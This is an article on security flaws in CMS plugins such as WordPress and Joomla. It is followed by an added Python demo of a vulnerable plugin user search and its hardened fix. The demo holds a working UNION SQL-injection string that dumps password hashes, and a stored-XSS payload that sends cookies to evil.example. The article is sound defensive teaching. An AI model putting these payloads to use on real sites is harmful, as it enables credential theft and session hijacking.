A large proportion of websites are not standalone creations in their own right but are built on CMSs such as Drupal, WordPress, and Joomla. This is particularly true of personal blogs, but using a CMS as the basis for a site has become increasingly popular among larger companies too. CMSs are used because they make it easy to post articles, simple for multiple people to contribute to a site, and straightforward to assign different users different access rights. They can also be extended through plugins, but those same extensions are a security disaster waiting to happen.
Security firm High-Tech Bridge frequently discovers vulnerabilities in extensions and plugins for popular CMSs. Its standard procedure is to notify the developer first and go public three weeks after the discovery; this gives the developer a chance to fix the problems before anyone else who might exploit them is alerted. High-Tech Bridge CEO Ilia Kolochenko says that CMS security issues are nothing new:
“For upwards of a decade the major CMS platforms such as Joomla and WordPress have been deeply researched by both black and white hat hackers. In the early days SQL injections and code execution flaws were commonplace. In fact, around 90 percent of websites were vulnerable to critical-risk attacks permitting [an attacker] to take control of the website remotely within a dozen minutes.”
A great deal of work has been put into ensuring that CMSs are secure out of the box, leading Kolochenko to say, “I would say that a popular CMS, such as WordPress or Joomla, may be considered secure in default installation if they are properly configured, don’t have third-party code and are up to date.”
But therein lies the rub. Start adding extensions into the mix, and it is a very different story. High-Tech Bridge points out that many plugins are written by inexperienced coders who lack the skills to ensure security. And there are very few vanilla CMS installations out in the wild; few people find a CMS that offers everything they need without a little help from third parties. A security flaw in a plugin can be at least as serious as any that existed in the CMS cores themselves in the past, because plugin code runs in the same process, with the same database credentials and on the same origin as the core, so nothing isolates a plugin bug from the site's most sensitive data. “By exploiting XSS and SQLi flaws in the plugins, the attacker can get at the admin password, the same as if he were exploiting these vulnerabilities in the core code of the web application.”
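To make the point concrete, here is an added example (not code from the article, from High-Tech Bridge, or from any real plugin): a plugin-style "search users" feature modelled in Python against a constructed, in-memory copy of a WordPress wp_users table. Real plugins are PHP talking to MySQL through $wpdb, and the user names, hashes and payload below are all made up, but the mechanics are the same: one string-built query hands an attacker every login and password hash in the table, and one unescaped output hands a low-privilege user the admin's session cookie.

```python
"""Added example: SQLi and stored XSS in a plugin-style user search, vulnerable and hardened.

Not code from the article or from any real plugin. SQLite stands in for MySQL and Python for
PHP; sample users, hashes and the XSS payload are constructed for the demo.
"""
import html
import sqlite3

# Constructed sample rows; the hashes are placeholders, not real phpass output.
SAMPLE_USERS = [
    ("admin", "$P$B.placeholder.admin.hash", "Site Admin"),
    ("editor", "$P$B.placeholder.editor.hash", "Editor"),
    # A stored-XSS payload a low-privilege user left in their profile's display name.
    ("spammer", "$P$B.placeholder.spammer.hash",
     "<script>new Image().src='https://evil.example/?c='+document.cookie</script>"),
]

# Attacker-supplied search term: closes the quote, appends a UNION that reads every
# login:hash pair, then comments out the trailing %' (SQLite concatenates with ||,
# MySQL would use CONCAT()).
INJECTION = "zzz%' UNION ALL SELECT user_login || ':' || user_pass FROM wp_users -- "


def build_db():
    """Create an in-memory table shaped like wp_users and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, "
        "user_pass TEXT, display_name TEXT)"
    )
    conn.executemany(
        "INSERT INTO wp_users (user_login, user_pass, display_name) VALUES (?, ?, ?)",
        SAMPLE_USERS,
    )
    return conn


def search_vulnerable(conn, term):
    """The plugin as too often written: the request parameter is pasted into the SQL."""
    sql = f"SELECT display_name FROM wp_users WHERE display_name LIKE '%{term}%'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, term):
    """Parameterised query (what $wpdb->prepare() gives you), with LIKE wildcards
    escaped as well (what $wpdb->esc_like() is for) so % and _ in input stay literal."""
    escaped = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT display_name FROM wp_users WHERE display_name LIKE ? ESCAPE '\\'"
    return [row[0] for row in conn.execute(sql, (f"%{escaped}%",))]


def render_vulnerable(names):
    """Echoes database content straight into HTML: stored XSS fires in the admin's browser."""
    return "<ul>" + "".join(f"<li>{n}</li>" for n in names) + "</ul>"


def render_safe(names):
    """HTML-escapes on output (esc_html() in WordPress); the payload renders as text."""
    return "<ul>" + "".join(f"<li>{html.escape(n)}</li>" for n in names) + "</ul>"


def demo():
    """Run both handlers against the same attacker input and return what each yields."""
    conn = build_db()
    leaked = search_vulnerable(conn, INJECTION)  # every login:hash pair, admin first
    blocked = search_safe(conn, INJECTION)       # nothing: the input is just a pattern
    names = search_safe(conn, "")                # an admin listing all users
    return {
        "sqli_leaked": leaked,
        "sqli_blocked": blocked,
        "xss_fires": "<script>" in render_vulnerable(names),
        "xss_escaped": "<script>" not in render_safe(names),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The injected term never has to touch the core: the plugin's own query runs with the site's database credentials, so the admin's password hash comes back in the plugin's search results, and the script tag stored by the lowest-privilege account runs in whichever administrator views the list. Fixing both is a matter of parameterising the query and escaping on output, which is exactly the discipline inexperienced plugin authors skip.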
In the case of WordPress alone, a staggering 33,621 plugins have been downloaded a total of 749,138,518 times, so the impact of exploiting security vulnerabilities in them could be huge.